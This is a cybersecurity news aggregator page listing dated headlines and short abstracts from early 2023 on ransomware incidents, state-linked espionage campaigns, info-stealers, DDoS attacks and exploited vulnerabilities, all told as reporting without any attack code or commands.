Sharp Panda Using New Soul Framework Version to Target Southeast Asian Governments Full Text
Abstract
High-profile government entities in Southeast Asia are the target of a cyber espionage campaign undertaken by a Chinese threat actor known as Sharp Panda since late last year. The intrusions are characterized by the use of a new version of the Soul modular framework, marking a departure from the group's attack chains observed in 2021. Israeli cybersecurity company Check Point said the "long-running" activities have historically singled out countries such as Vietnam, Thailand, and Indonesia. Sharp Panda was first documented by the firm in June 2021, describing it as a "highly-organized operation that placed significant effort into remaining under the radar." Interestingly, the use of the Soul backdoor was detailed by Broadcom's Symantec in October 2021 in connection to an unattributed espionage operation targeting defense, healthcare, and ICT sectors in Southeast Asia. The implant's origins, according to research published by Fortinet FortiGThe Hacker News
March 8, 2023
Update: Israel blames state-sponsored Iranian hackers for ransomware attack on university Full Text
Abstract
The attack in February forced the Israel Institute of Technology (Technion) to postpone exams and shut down its IT systems. The incident followed what Israeli defense officials said were dozens of attempted Iranian cyberattacks over the past year.Cyware
March 7, 2023
SYS01 stealer targets critical government infrastructure Full Text
Abstract
Researchers discovered a new info stealer dubbed SYS01 stealer targeting critical government infrastructure and manufacturing firms. Cybersecurity researchers from Morphisec discovered a new, advanced information stealer, dubbed SYS01 stealer,...Security Affairs
March 6, 2023
Ransom House ransomware attack hit Hospital Clinic de Barcelona Full Text
Abstract
Hospital Clinic de Barcelona, one of the main hospitals in the Spanish city, suffered a cyber attack that crippled its computer system. On Sunday, a ransomware attack hit the Hospital Clinic de Barcelona, one of the main hospitals of the Catalan city....Security Affairs
March 5, 2023
Credential Stuffing attack on Chick-fil-A impacted +71K users Full Text
Abstract
American fast-food restaurant chain Chick-fil-A reported that the accounts of over 71K users were compromised as a result of a credential stuffing campaign. The American fast-food restaurant chain Chick-fil-A notified over 71K users that their accounts...Security Affairs
March 4, 2023
Southeastern Louisiana University ‘Likely’ Suffered Cyber Attack Full Text
Abstract
Southeastern Louisiana University suffered a week-long outage of its website, email, or system for submitting assignments after a "potential incident" last week caused the university to shut down its network.Cyware
March 3, 2023
Hundreds of thousands of websites hacked as part of redirection campaign Full Text
Abstract
Thousands of Websites Hijacked Using Compromised FTP Credentials Researchers reported that threat actors compromised thousands of websites using legitimate FTP credentials to hijack traffic. Cybersecurity firm Wiz reported that since early September...Security Affairs
March 3, 2023
Poland Blames Russian Hackers for Cyberattack on Tax Service Website Full Text
Abstract
The distributed denial-of-service (DDoS) attack occurred on Tuesday, causing the website to crash for approximately one hour and blocking users’ access to the online tax filing system.Cyware
March 2, 2023
Cryptojacking campaign targets insecure deployments of Redis servers Full Text
Abstract
Researchers from Cado Security discovered a cryptojacking campaign targeting misconfigured Redis database servers. Cado Labs researchers recently discovered a new cryptojacking campaign targeting insecure deployments of Redis database servers. Threat...Security Affairs
March 2, 2023
Pierce Transit and City of Lakewood Investigating Potential Ransomware Attacks Full Text
Abstract
A Pierce Transit spokesperson told KOMO News in a statement that on Feb. 14, the agency "experienced a ransomware incident that temporarily disrupted some agency systems.Cyware
March 2, 2023
Threat actors target law firms with GootLoader and SocGholish malware Full Text
Abstract
Cyber criminals are targeting law firms with GootLoader and FakeUpdates (aka SocGholish) malware families. Researchers from eSentire have foiled 10 cyberattacks targeting six different law firms throughout January and February of 2023. The firms...Security Affairs
February 28, 2023
U.S. Marshals Service suffers a ransomware attack Full Text
Abstract
The U.S. Marshals Service (USMS) was the victim of a ransomware attack, it is investigating the theft of sensitive information. The U.S. Marshals Service (USMS) announced that a ransomware attack has impacted "a stand-alone USMS system." The US bureau...Security Affairs
February 27, 2023
Thousands of Cloud Servers Targeted by the Mysterious Nevada Group Full Text
Abstract
An unidentified group of ransomware hackers, dubbed Nevada Group, has targeted the computer networks of almost 5,000 victims across the U.S. and Europe. Hackers ask for two Bitcoins (which is around $50,000) and their ransom notes are publicly visible. The CISA has released a simple workaround ... Read MoreCyware
February 27, 2023
Nine Danish Hospitals Suffer Cyberattack From ‘Anonymous Sudan’ Full Text
Abstract
Copenhagen’s health authority said on Twitter that although the websites for the hospitals were down, medical care at the facilities was unaffected by the attacks. It later added the sites were back online after “a couple of hours.”Cyware
February 27, 2023
PureCrypter Malware Targets Government Entities in Asia-Pacific and North America Full Text
Abstract
Government entities in Asia-Pacific and North America are being targeted by an unknown threat actor with an off-the-shelf malware downloader known as PureCrypter to deliver an array of information stealers and ransomware. "The PureCrypter campaign uses the domain of a compromised non-profit organization as a command-and-control (C2) to deliver a secondary payload," Menlo Security researcher Abhay Yadav said . The different types of malware propagated using PureCrypter include RedLine Stealer , Agent Tesla , Eternity , Blackmoon (aka KRBanker ), and Philadelphia ransomware. First documented in June 2022, PureCrypter is advertised for sale by its author for $59 for one-month access (or $245 for a one-off lifetime purchase) and is capable of distributing a multitude of malware. In December 2022, PureCoder – the developer behind the program – expanded the slate of offerings to include a logger and information stealer known as PureLogs, which is designed to siThe Hacker News
February 27, 2023
PlugX Trojan Disguised as Legitimate Windows Debugger Tool in Latest Attacks Full Text
Abstract
The PlugX remote access trojan has been observed masquerading as an open source Windows debugger tool called x64dbg in an attempt to circumvent security protections and gain control of a target system. "This file is a legitimate open-source debugger tool for Windows that is generally used to examine kernel-mode and user-mode code, crash dumps, or CPU registers," Trend Micro researchers Buddy Tancio, Jed Valderama, and Catherine Loveria said in a report published last week. PlugX, also known as Korplug , is a post-exploitation modular implant , which, among other things, is known for its multiple functionalities such as data exfiltration and its ability to use the compromised machine for nefarious purposes. Although first documented a decade ago in 2012, early samples of the malware date as far as February 2008, according to a Trend Micro report at the time. Over the years, PlugX has been used by threat actors with a Chinese nexus as well as cybercrime groups. OnThe Hacker News
February 25, 2023
Clasiopa group targets materials research in Asia Full Text
Abstract
A previously unknown threat actor, tracked as Clasiopa, is using a distinct toolset in attacks aimed at materials research organizations in Asia. Broadcom Symantec researchers have reported that a previously unknown threat actor, tracked as Clasiopa,...Security Affairs
February 22, 2023
Direct Kernel Object Manipulation (DKOM) Attacks on ETW Providers Full Text
Abstract
ETW is a high-speed tracing facility built into the Windows operating system. It enables the logging of events and system activities by applications, drivers, and the operating system.Cyware
February 20, 2023
A sophisticated threat actor hit cryptocurrency exchange Coinbase Full Text
Abstract
The Coinbase cryptocurrency exchange was the victim of a sophisticated cyberattack, experts believe is was targeted by Twilio hackers. A sophisticated threat actor launched a smishing campaign against the employees of the cryptocurrency exchange Coinbase. According...Security Affairs
February 20, 2023
Lockbit Ransomware Gang Hit the Portuguese Municipal Water Utility Aguas do Porto Full Text
Abstract
Lockbit added the municipal water utility company to the list of victims on its Tor leak site, the deadline is March 07, 2023. CNN Portugal confirmed that the National Cybersecurity Center and the Judiciary Police are investigating the breach.Cyware
February 20, 2023
Google Reveals Alarming Surge in Russian Cyber Attacks Against Ukraine Full Text
Abstract
Russia's cyber attacks against Ukraine surged by 250% in 2022 when compared to two years ago, Google's Threat Analysis Group (TAG) and Mandiant disclosed in a new joint report. The targeting, which coincided and has since persisted following the country's military invasion of Ukraine in February 2022, focused heavily on the Ukrainian government and military entities, alongside critical infrastructure, utilities, public services, and media sectors. Mandiant said it observed, "more destructive cyber attacks in Ukraine during the first four months of 2022 than in the previous eight years with attacks peaking around the start of the invasion." As many as six unique wiper strains – including WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, Industroyer2, and SDelete – have been deployed against Ukrainian networks, suggesting a willingness on the part of Russian threat actors to forgo persistent access. Phishing attacks aimed at NATO countries witnessed a 3The Hacker News
February 20, 2023
Cyber Espionage Group Earth Kitsune Deploys WhiskerSpy Backdoor in Latest Attacks Full Text
Abstract
The cyber espionage threat actor tracked as Earth Kitsune has been observed deploying a new backdoor called WhiskerSpy as part of a social engineering campaign. Earth Kitsune, active since at least 2019, is known to primarily target individuals interested in North Korea with self-developed malware such as dneSpy and agfSpy. Previously documented intrusions have entailed the use of watering holes that leverage browser exploits in Google Chrome and Internet Explorer to activate the infection chain. The differentiating factor in the latest attacks is a shift to social engineering to trick users into visiting compromised websites related to North Korea, according to a new report from Trend Micro released last week. The cybersecurity company said the website of an unnamed pro-North Korean organization was hacked and modified to distribute the WhiskerSpy implant. The compromise was discovered at the end of last year. "When a targeted visitor tries to watch videos on the websitThe Hacker News
February 20, 2023
Hackers Target Chinese Speaking Individuals via Poisoned Google Search Full Text
Abstract
Security analysts at ESET unearthed a malware campaign targeting Chinese-speaking people in Southeast and East Asia. The unknown hacker group has created copycat websites of popular apps, such as Firefox, WhatsApp, and Telegram. Along with legitimate software, cyber foes also deliver FatalRAT to ta ... Read MoreCyware
February 20, 2023
Lockbit ransomware gang hit the Portuguese municipal water utility Aguas do Porto Full Text
Abstract
The LockBit ransomware gang claims to have hacked Aguas do Porto, a Portuguese municipal water utility company. The LockBit ransomware gang claims to have hacked Aguas do Porto, a Portuguese municipal water utility company, and is threatening to leak...Security Affairs
February 17, 2023
Armenian Entities Hit by New Version of OxtaRAT Spying Tool Full Text
Abstract
Entities in Armenia have come under a cyber attack using an updated version of a backdoor called OxtaRAT that allows remote access and desktop surveillance. "The tool capabilities include searching for and exfiltrating files from the infected machine, recording the video from the web camera and desktop, remotely controlling the compromised machine with TightVNC, installing a web shell, performing port scanning, and more," Check Point Research said in a report. The latest campaign is said to have commenced in November 2022 and marks the first time the threat actors behind the activity have expanded their focus beyond Azerbaijan. "The threat actors behind these attacks have been targeting human rights organizations, dissidents, and independent media in Azerbaijan for several years," the cybersecurity firm noted, calling the campaign Operation Silent Watch. The late 2022 intrusions are significant, not least because of the changes in the infection chain, the sThe Hacker News
February 16, 2023
Researchers Link SideWinder Group to Dozens of Targeted Attacks in Multiple Countries Full Text
Abstract
The prolific SideWinder group has been attributed as the nation-state actor behind attempted attacks against 61 entities in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka between June and November 2021. Targets included government, military, law enforcement, banks, and other organizations, according to an exhaustive report published by Group-IB, which also found links between the adversary and two other intrusion sets tracked as Baby Elephant and DoNot Team . SideWinder is also referred to as APT-C-17, Hardcore Nationalist (HN2), Rattlesnake, Razor Tiger, and T-APT4. It's suspected to be of Indian origin, although Kaspersky in 2022 noted that the attribution is no longer deterministic. The group has been linked to no less than 1,000 attacks against government organizations in the Asia-Pacific region since April 2020, according to a report from the Russian cybersecurity firm early last year. Of the 61 potential targets compiled by Group-IB, 29 of them are locatedThe Hacker News
February 15, 2023
City of Oakland issued a local state of emergency after recent ransomware attack Full Text
Abstract
The City of Oakland has declared a local state of emergency due to the effect of the ransomware attack that hit the city on February 8, 2023. The City of Oakland disclosed last week a ransomware attack, the security breach began on February 8, 2023....Security Affairs
February 15, 2023
Tonga is the latest Pacific Island nation hit with ransomware Full Text
Abstract
Tonga Communications Corporation (TCC) — one of two telecoms companies in the country — published a notice on Facebook saying the attack may slow down administrative operations.Cyware
February 14, 2023
11,000 WordPress Sites Hacked in a Backdoor Attack Full Text
Abstract
According to Sucuri’s research, the backdoor redirects users to sites that show fraudulent views of Google AdSense ads. The company’s SiteCheck remote scanner has detected more than 10,890 infected sites.Cyware
February 14, 2023
GoAnywhere Zero-Day Attack Victims Start Disclosing Significant Impact Full Text
Abstract
In an SEC filing, Community Health Systems (CHS), one of the largest US healthcare services providers, revealed that a “security breach experienced by Fortra” resulted in the exposure of personal info and PHI belonging to patients of CHS affiliates.Cyware
February 14, 2023
Chinese Hackers Targeting South American Diplomatic Entities with ShadowPad Full Text
Abstract
Microsoft on Monday attributed a China-based cyber espionage actor to a set of attacks targeting diplomatic entities in South America. The tech giant's Security Intelligence team is tracking the cluster under the emerging moniker DEV-0147 , describing the activity as an "expansion of the group's data exfiltration operations that traditionally targeted government agencies and think tanks in Asia and Europe." The threat actor is said to use established hacking tools such as ShadowPad to infiltrate targets and maintain persistent access. ShadowPad, also called PoisonPlug, is a successor to the PlugX remote access trojan and has been widely put to use by Chinese adversarial collectives with links to the Ministry of State Security (MSS) and People's Liberation Army (PLA), per Secureworks. One of the other malicious tools utilized by DEV-0147 is a webpack loader called QuasarLoader , which allows for deploying additional payloads onto the compromised hosts.The Hacker News
February 14, 2023
Massive HTTP DDoS Attack Hits Record High of 71 Million Requests/Second Full Text
Abstract
Web infrastructure company Cloudflare on Monday disclosed that it thwarted a record-breaking distributed denial-of-service (DDoS) attack that peaked at over 71 million requests per second (RPS). "The majority of attacks peaked in the ballpark of 50-70 million requests per second (RPS) with the largest exceeding 71 million," the company said , calling it a "hyper-volumetric" DDoS attack. It's also the largest HTTP DDoS attack reported to date, more than 35% higher than the previous 46 million RPS DDoS attack that Google Cloud mitigated in June 2022 . Cloudflare said the attacks singled out websites secured by its platform and that they emanated from a botnet comprising more than 30,000 IP addresses that belonged to "numerous" cloud providers. Targeted websites included a popular gaming provider, cryptocurrency companies, hosting providers, and cloud computing platforms. HTTP attacks of this kind are designed to send a tsunami of HTTP requests tThe Hacker News
February 14, 2023
New MortalKombat Ransomware and Laplas Clipper Malware Threats Deployed in Recent Attacks Full Text
Abstract
Talos observed the actor scanning the internet for victim machines with an exposed remote desktop protocol (RDP) port 3389, using one of their download servers that run an RDP crawler and also facilitates MortalKombat ransomware.Cyware
February 14, 2023
Hackers Target Bahrain Airport, State News Agency Sites to Mark Uprising Full Text
Abstract
Hackers said they had taken down the websites of Bahrain’s international airport and state news agency on Tuesday to mark the 12-year anniversary of an Arab Spring uprising in the small Gulf country.Cyware
February 13, 2023
Chinese Tonto Team Hackers’ Second Attempt to Target Cybersecurity Firm Group-IB Fails Full Text
Abstract
The advanced persistent threat (APT) actor known as Tonto Team carried out an unsuccessful attack on cybersecurity company Group-IB in June 2022. The Singapore-headquartered firm said that it detected and blocked malicious phishing emails originating from the group targeting its employees. It's also the second attack aimed at Group-IB, the first of which took place in March 2021. Tonto Team, also called Bronze Huntley, Cactus Pete , Earth Akhlut, Karma Panda, and UAC-0018, is a suspected Chinese hacking group that has been linked to attacks targeting a wide range of organizations in Asia and Eastern Europe. The actor is known to be active since at least 2009 and is said to share ties to the Third Department ( 3PLA ) of the People's Liberation Army's Shenyang TRB ( Unit 65016 ). Attack chains involve spear-phishing lures containing malicious attachments created using the Royal Road Rich Text Format (RTF) exploitation toolkit to drop backdoors like Bisonal, DexbiThe Hacker News
February 12, 2023
The Israel Institute of Technology Technion suffered a ransomware attack Full Text
Abstract
The Technion – Israel Institute of Technology was breached on Sunday by a new anti-Israel threat actor calling itself DarkBit. Technion – Israel Institute of Technology is Israel's top technology research university and a leading center for cyber...Security Affairs
February 11, 2023
Clop ransomware claims the hack of 130 orgs using GoAnywhere MFT flaw Full Text
Abstract
The Clop ransomware group claims to have breached over 130 organizations exploiting the GoAnywhere MFT zero-day. The Clop ransomware group claims to have stolen sensitive data from over 130 organizations by exploiting a zero-day vulnerability (CVE-2023-0669)...Security Affairs
February 10, 2023
Ransomware attack hit the City of Oakland Full Text
Abstract
A ransomware attack hit the City of Oakland this week, forcing it to take all systems offline in response to the incident. The City of Oakland disclosed a ransomware attack, the security breach began on Wednesday night. In an abundance of caution,...Security Affairs
February 9, 2023
QakNote Campaign Leverages OneNote to Infect Victims with QBot Full Text
Abstract
A large-scale QakNote campaign is ongoing that drops QBot banking trojan on systems via malicious Microsoft OneNote attachments. The phishing emails contain OneNote files that have an embedded HTML application (HTA file) that retrieves the QBot malware payload. The adoption signals “a much more aut ... Read MoreCyware
February 08, 2023
Russian Hackers Using Graphiron Malware to Steal Data from Ukraine Full Text
Abstract
A Russia-linked threat actor has been observed deploying a new information-stealing malware in cyber attacks targeting Ukraine. Dubbed Graphiron by Broadcom-owned Symantec, the malware is the handiwork of an espionage group known as Nodaria , which is tracked by the Computer Emergency Response Team of Ukraine (CERT-UA) as UAC-0056. "The malware is written in Go and is designed to harvest a wide range of information from the infected computer, including system information, credentials, screenshots, and files," the Symantec Threat Hunter Team said in a report shared with The Hacker News. Nodaria was first spotlighted by CERT-UA in January 2022, calling attention to the adversary's use of SaintBot and OutSteel malware in spear-phishing attacks targeting government entities. The group, which is said to be active since at least April 2021, has since repeatedly deployed custom backdoors such as GraphSteel and GrimPlant in various campaigns since Russia'sThe Hacker News
February 8, 2023
Ransomware Attacks Target VMware ESXi Servers Worldwide Full Text
Abstract
Threats surrounding VMware ESXi servers have multiplied. At least two ransomware variants, including Royal Ransomware and ESXiArgs, were found launching attacks on the servers. The latter exploits an old VMware flaw, identified as CVE-2021-21974. With this, they has joined the likes of Black B ... Read MoreCyware
February 7, 2023
British Steel Industry Supplier Vesuvius Suffers Cyber Incident Full Text
Abstract
The British manufacturer confirmed that the incident “involved unauthorized access to our systems,” although it did not provide further details on what the access was or what kind of cyber actor may have been responsible.Cyware
February 7, 2023
VMware has no evidence of zero-day exploitation in ESXiArgs ransomware attacks Full Text
Abstract
VMware said there is no evidence that threat actors are exploiting a zero-day flaw in its software as part of an ongoing ESXiArgs ransomware campaign. VMware said that it found no evidence that the threat actors behind the ongoing ESXiArgs ransomware...Security Affairs
February 7, 2023
Massachusetts-Based MKS Instruments Falls Victim to Ransomware Attack Full Text
Abstract
The company said it has notified law enforcement authorities while it investigates and assesses the impact of the incident by engaging “appropriate incident response professionals.”Cyware
February 07, 2023
VMware Finds No Evidence of 0-Day in Ongoing ESXiArgs Ransomware Spree Full Text
Abstract
VMware on Monday said it found no evidence that threat actors are leveraging an unknown security flaw, i.e., a zero-day, in its software as part of an ongoing ransomware attack spree worldwide. "Most reports state that End of General Support (EoGS) and/or significantly out-of-date products are being targeted with known vulnerabilities which were previously addressed and disclosed in VMware Security Advisories (VMSAs)," the virtualization services provider said . The company is further recommending users to upgrade to the latest available supported releases of vSphere components to mitigate known issues and disable the OpenSLP service in ESXi. "In 2021, ESXi 7.0 U2c and ESXi 8.0 GA began shipping with the service disabled by default," VMware added. The announcement comes as unpatched and unsecured VMware ESXi servers around the world have been targeted in a large-scale ransomware campaign dubbed ESXiArgs by likely exploiting a two-year-old bug VMware pThe Hacker News
February 6, 2023
Hackers Target Switzerland’s Largest University With ‘Professional’ Cyberattack Full Text
Abstract
The university said on Friday that it is battling to keep the hackers out of critical zones by isolating parts of its IT system. This defense has compromised access to its systems but prevented cyberattackers from encrypting or extracting data.Cyware
February 04, 2023
New Wave of Ransomware Attacks Exploiting VMware Bug to Target ESXi Servers Full Text
Abstract
VMware ESXi hypervisors are the target of a new wave of attacks designed to deploy ransomware on compromised systems. "These attack campaigns appear to exploit CVE-2021-21974, for which a patch has been available since February 23, 2021," the Computer Emergency Response Team (CERT) of France said in an advisory on Friday. VMware, in its own alert released at the time, described the issue as an OpenSLP heap-overflow vulnerability that could lead to the execution of arbitrary code. "A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution," the virtualization services provider noted . French cloud services provider OVHcloud said the attacks are being detected globally with a specific focus on Europe. It's being suspected that the intrusions are related to a new Rust-based ransomware strain called Nevada that emergedThe Hacker News
February 2, 2023
Global Derivatives Markets Impacted by LockBit Ransomware Attack on Financial Software Company Full Text
Abstract
The attack is “impacting the trading and clearing of exchange-traded derivatives by ION customers across global markets,” according to the Futures Industry Association (FIA).Cyware
February 2, 2023
‘No Pineapple’ Cyber Espionage Campaign Reveals North Korean Toolkit Full Text
Abstract
A threat intelligence firm spotted North Korean hackers engaged in technological espionage in a campaign that betrayed recurring elements of the Pyongyang hacking toolkit.Cyware
February 1, 2023
Pro-Russia Killnet group hit Dutch and European hospitals Full Text
Abstract
The Dutch National Cyber Security Centre (NCSC) confirmed that Pro-Russia group Killnet hit websites of national and European hospitals. The Dutch National Cyber Security Centre (NCSC) reported that the websites of several hospital in the Netherlands...Security Affairs
February 01, 2023
Experts Warn of ‘Ice Breaker’ Cyberattacks Targeting Gaming and Gambling Industry Full Text
Abstract
A new attack campaign has targeted the gaming and gambling sectors since at least September 2022, just months prior to the ICE London 2023 gaming industry trade fair event that's scheduled next week. Israeli cybersecurity company Security Joes is tracking the activity cluster under the name Ice Breaker , stating the intrusions employ clever social engineering tactics to deploy a JavaScript backdoor. The attack sequence proceeds as follows: The threat actor poses as a customer while initiating a conversation with a support agent of a gaming website and urges the individual on the other end to open a screenshot image hosted on Dropbox. Security Joes said that the threat actor is "well-aware of the fact that the customer service is human-operated." Clicking the malicious link sent in the chat leads to the retrieval of an LNK payload or, alternatively, a VBScript file as a backup option, the former of which is configured to download and run an MSI package containinThe Hacker News
February 1, 2023
Update: LockBit takes credit for November ransomware attack on Sacramento PBS station Full Text
Abstract
The PBS station KVIE announced the attack on November 23, noting that some of its internal systems were affected on October 31. It immediately took systems offline, notified law enforcement, and hired experts to investigate the incident.Cyware
January 31, 2023
Ukraine Targeted via New Waves of Data Wipers, Including SwiftSlicer Full Text
Abstract
A lot has happened on the cyber front in Ukraine and Russia ever since the war began. Joining the bandwagon, on the behalf of Russian Sandworm APT, is a pack of five wiper malware, including the new Golang-based SwiftSlicer. The new wiper has been added to the VirusTotal database recently (sub ... Read MoreCyware
January 28,2023
Ukraine Hit with New Golang-based ‘SwiftSlicer’ Wiper Malware in Latest Cyber Attack Full Text
Abstract
Ukraine has come under a fresh cyber onslaught from Russia that involved the deployment of a previously undocumented Golang-based data wiper dubbed SwiftSlicer . ESET attributed the attack to Sandworm, a nation-state group linked to Military Unit 74455 of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). "Once executed it deletes shadow copies, recursively overwrites files located in %CSIDL_SYSTEM%\drivers, %CSIDL_SYSTEM_DRIVE%\Windows\NTDS and other non-system drives and then reboots computer," ESET disclosed in a series of tweets. The overwrites are achieved by using randomly generated byte sequences to fill 4,096 byte-length blocks. The intrusion was discovered on January 25, 2023, the Slovak cybersecurity company added. Sandworm, also tracked under the monikers BlackEnergy, Electrum, Iridium, Iron Viking, TeleBots, and Voodoo Bear, has a history of staging disruptive and destructive cyber campaigns targetThe Hacker News
January 27, 2023
New Wave of Database Injection Attacks Compromise WordPress Sites Full Text
Abstract
The latest wave has been active since December 26, 2022, and over 5,600 websites are impacted by it so far. It has switched from fake CAPTCHA push notification scams to black hat ad networks.Cyware
January 25, 2023
Massive Attack Campaign Uses Hacked WordPress Sites as Platform for Black Hat Ad Network Full Text
Abstract
PublicWWW results show over 4,500 websites impacted by this malware at the time of writing, while urlscan.io shows evidence of the campaign operating since December 26, 2022.Cyware
January 20,2023
Gamaredon Group Launches Cyberattacks Against Ukraine Using Telegram Full Text
Abstract
The Russian state-sponsored cyber espionage group known as Gamaredon has continued its digital onslaught against Ukraine, with recent attacks leveraging the popular messaging app Telegram to strike military and law enforcement sectors in the country. "The Gamaredon group's network infrastructure relies on multi-stage Telegram accounts for victim profiling and confirmation of geographic location, and then finally leads the victim to the next stage server for the final payload," the BlackBerry Research and Intelligence Team said in a report shared with The Hacker News. "This kind of technique to infect target systems is new." Gamaredon , also known by names such as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and Winterflounder, is known for its assaults aimed at Ukrainian entities since at least 2013. Last month, Palo Alto Networks Unit 42 disclosed the threat actor's unsuccessful attempts to break into an unnamed petrolThe Hacker News
January 18,2023
Iranian Government Entities Under Attack by New Wave of BackdoorDiplomacy Attacks Full Text
Abstract
The threat actor known as BackdoorDiplomacy has been linked to a new wave of attacks targeting Iranian government entities between July and late December 2022. Palo Alto Networks Unit 42, which is tracking the activity under its constellation-themed moniker Playful Taurus , said it observed the government domains attempting to connect to malware infrastructure previously identified as associated with the adversary. Also known by the names APT15, KeChang, NICKEL, and Vixen Panda, the Chinese APT group has a history of cyber espionage campaigns aimed at government and diplomatic entities across North America, South America, Africa, and the Middle East at least since 2010. Slovak cybersecurity firm ESET, in June 2021, unpacked the intrusions mounted by hacking crew against diplomatic entities and telecommunication companies in Africa and the Middle East using a custom implant known as Turian. Then in December 2021, Microsoft announced the seizure of 42 domains operated by tThe Hacker News
January 17, 2023
1,000 ships impacted by a ransomware attack on maritime software supplier DNV Full Text
Abstract
A ransomware attack against the maritime software supplier DNV impacted approximately 1,000 vessels. About 1,000 vessels have been impacted by a ransomware attack against DNV, one of the major maritime software suppliers. DNV GL provides solutions...Security Affairs
January 17, 2023
Danish Consumers Targeted by Smishing Attack Wave Full Text
Abstract
Contacted by an anonymous reader, Heimdal was made aware that numerous Danish smartphone owners have been flooded by cryptic messages from a user that goes by the moniker of “Dansk-game.”Cyware
January 14,2023
Malware Attack on CircleCI Engineer’s Laptop Leads to Recent Security Incident Full Text
Abstract
DevOps platform CircleCI on Friday disclosed that unidentified threat actors compromised an employee's laptop and leveraged malware to steal their two-factor authentication-backed credentials to breach the company's systems and data last month. The CI/CD service CircleCI said the "sophisticated attack" took place on December 16, 2022, and that the malware went undetected by its antivirus software. "The malware was able to execute session cookie theft, enabling them to impersonate the targeted employee in a remote location and then escalate access to a subset of our production systems," Rob Zuber, CircleCI's chief technology officer, said in an incident report. Further analysis of the security lapse revealed that the unauthorized third-party pilfered data from a subset of its databases by abusing the elevated permissions granted to the targeted employee. This included customer environment variables, tokens, and keys. The threat actor is believed tThe Hacker News
January 13, 2023
LockBit ransomware operation behind the Royal Mail cyberattack Full Text
Abstract
The cyberattack on Royal Mail, Britain’s postal service, is a ransomware attack that was linked to the LockBit ransomware operation. Royal Mail, the British multinational postal service and courier company, this week announced...Security Affairs
January 13, 2023
Threat actors target govt networks exploiting Fortinet SSL-VPN CVE-2022-42475 bug Full Text
Abstract
Recently patched Fortinet FortiOS SSL-VPN zero-day exploited in attacks against government organizations and government-related targets. Fortinet researchers reported how threat actors exploited the recently patched FortiOS SSL-VPN vulnerability (CVE-2022-42475)...Security Affairs
January 13,2023
FortiOS Flaw Exploited as Zero-Day in Attacks on Government and Organizations Full Text
Abstract
A zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting the government and other large organizations. "The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers said in a post-mortem analysis published this week. The attacks entailed the exploitation of CVE-2022-42475 , a heap-based buffer overflow flaw that could enable an unauthenticated remote attacker to execute arbitrary code via specifically crafted requests. The infection chain analyzed by the company shows that the end goal was to deploy a generic Linux implant modified for FortiOS that's equipped to compromise Fortinet's intrusion prevention system ( IPS ) software and establish connections with a remote server to download additional malware and execute commands. Fortinet said it was unable to recover the payloads used in the suThe Hacker News
January 11, 2023
New Info-Stealer Malware Campaign Targets Italian Users Full Text
Abstract
The multi-stage infection sequence begins with a phishing email containing a link that downloads a password-protected ZIP archive file with two files: a shortcut (.LNK) file and a batch (.BAT) file.Cyware
January 11,2023
Australian Healthcare Sector Targeted in Latest Gootkit Malware Attacks Full Text
Abstract
A wave of Gootkit malware loader attacks has targeted the Australian healthcare sector by leveraging legitimate tools like VLC Media Player. Gootkit , also called Gootloader, is known to employ search engine optimization (SEO) poisoning tactics (aka spamdexing) for initial access. It typically works by compromising and abusing legitimate infrastructure and seeding those sites with common keywords. Like other malware of its kind, Gootkit is capable of stealing data from the browser, performing adversary-in-the-browser (AitB) attacks, keylogging, taking screenshots, and other malicious actions. Trend Micro's new findings reveal that the keywords "hospital," "health," "medical," and "enterprise agreement" have been paired with various city names in Australia, marking the malware's expansion beyond accounting and law firms. The starting point of the cyber assault is to direct users searching for the same keywords to an infected WoThe Hacker News
January 11, 2023
Gootkit Loader campaign targets Australian Healthcare Industry Full Text
Abstract
Threat actors are targeting organizations in the Australian healthcare sector with the Gootkit malware loader. Trend Micro researchers warn that Gootkit Loader is actively targeting the Australian healthcare industry. The experts analyzed a series...Security Affairs
January 11, 2023
Lorenz Ransomware Completes its Attack After Five Months Full Text
Abstract
S-RM researchers identified a Lorenz ransomware attack that was completed months after the attackers gained initial access. They exploited CVE-2022-29499, a vulnerability in Mitel telephony infrastructure.Cyware
January 10, 2023
British Company That Supports Semiconductor Manufacturing Hit by Cyber Incident Full Text
Abstract
No explanation of the attack’s impact on its business operations has yet been disclosed, nor has the nature of the attack. The company stated it is “taking steps to ensure that its businesses can continue to trade with its customers and suppliers.”Cyware
January 10,2023
Italian Users Warned of Malware Attack Targeting Sensitive Information Full Text
Abstract
A new malware campaign has been observed targeting Italy with phishing emails designed to deploy an information stealer on compromised Windows systems. "The info-stealer malware steals sensitive information like system info, crypto wallet and browser histories, cookies, and credentials of crypto wallets from victim machines," Uptycs security researcher Karthickkumar Kathiresan said in a report. Details of the campaign were first disclosed by Milan-based IT services firm SI.net last month. The multi-stage infection sequence commences with an invoice-themed phishing email containing a link that, when clicked, downloads a password-protected ZIP archive file, which harbors two files: A shortcut (.LNK) file and a batch (.BAT) file. Irrespective of which file is launched, the attack chain remains the same, as opening the shortcut file fetches the same batch script designed to install the information stealer payload from a GitHub repository. This is achieved by leveragingThe Hacker News
January 10, 2023
San Francisco Bay Area Rapid Transit Investigating Vice Society Ransomware Attack Full Text
Abstract
While the attack did not cause any damage and no riders were put at risk, city officials raised alarms in a report because the attackers could have reached critical systems and may have left backdoors inside.Cyware
January 09,2023
Kinsing Cryptojacking Hits Kubernetes Clusters via Misconfigured PostgreSQL Full Text
Abstract
The threat actors behind the Kinsing cryptojacking operation have been spotted exploiting misconfigured and exposed PostgreSQL servers to obtain initial access to Kubernetes environments. A second initial access vector technique entails the use of vulnerable images, Sunders Bruskin, security researcher at Microsoft Defender for Cloud, said in a report last week. Kinsing has a storied history of targeting containerized environments , often leveraging misconfigured open Docker daemon API ports as well as abusing newly disclosed exploits to drop cryptocurrency mining software. The threat actor, in the past, has also been discovered employing a rootkit to hide its presence, in addition to terminating and uninstalling competing resource-intensive services and processes. Now according to Microsoft, misconfigurations in PostgreSQL servers have been co-opted by the Kinsing actor to gain an initial foothold, with the company observing a "large amount of clusters" infeThe Hacker News
January 7, 2023
Attackers Abuse Genuine Windows Tool to Deliver Pupy RAT Full Text
Abstract
